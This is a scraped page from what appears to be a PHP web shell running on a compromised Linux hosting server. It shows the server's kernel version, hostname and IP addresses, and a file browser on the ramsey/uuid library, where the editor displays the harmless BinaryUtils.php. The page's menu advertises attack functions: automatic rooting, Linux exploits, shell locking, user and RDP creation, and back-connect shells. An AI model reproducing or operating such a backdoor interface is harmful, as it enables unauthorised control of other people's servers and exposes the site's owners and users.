Linux server.bornosky.com 4.18.0-477.13.1.lve.el8.x86_64 #1 SMP Thu Jun 1 16:40:47 EDT 2023 x86_64
Apache
: 95.217.200.235 | : 52.14.66.242
Cant Read [ /etc/named.conf ]
7.3.33
aggscedu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
aggscedu /
public_html /
vendor /
ramsey /
uuid /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Builder
[ DIR ]
drwxr-xr-x
Codec
[ DIR ]
drwxr-xr-x
Converter
[ DIR ]
drwxr-xr-x
Exception
[ DIR ]
drwxr-xr-x
Generator
[ DIR ]
drwxr-xr-x
Provider
[ DIR ]
drwxr-xr-x
BinaryUtils.php
1.04
KB
-rw-r--r--
DegradedUuid.php
3.6
KB
-rw-r--r--
FeatureSet.php
9
KB
-rw-r--r--
Uuid.php
22.13
KB
-rw-r--r--
UuidFactory.php
8.3
KB
-rw-r--r--
UuidFactoryInterface.php
3.82
KB
-rw-r--r--
UuidInterface.php
9.23
KB
-rw-r--r--
functions.php
2.31
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : BinaryUtils.php
<?php namespace Ramsey\Uuid; /** * Provides binary math utilities */ class BinaryUtils { /** * Applies the RFC 4122 variant field to the `clock_seq_hi_and_reserved` field * * @param $clockSeqHi * @return int The high field of the clock sequence multiplexed with the variant * @link http://tools.ietf.org/html/rfc4122#section-4.1.1 */ public static function applyVariant($clockSeqHi) { // Set the variant to RFC 4122 $clockSeqHi = $clockSeqHi & 0x3f; $clockSeqHi |= 0x80; return $clockSeqHi; } /** * Applies the RFC 4122 version number to the `time_hi_and_version` field * * @param string $timeHi * @param integer $version * @return int The high field of the timestamp multiplexed with the version number * @link http://tools.ietf.org/html/rfc4122#section-4.1.3 */ public static function applyVersion($timeHi, $version) { $timeHi = hexdec($timeHi) & 0x0fff; $timeHi |= $version << 12; return $timeHi; } }
Close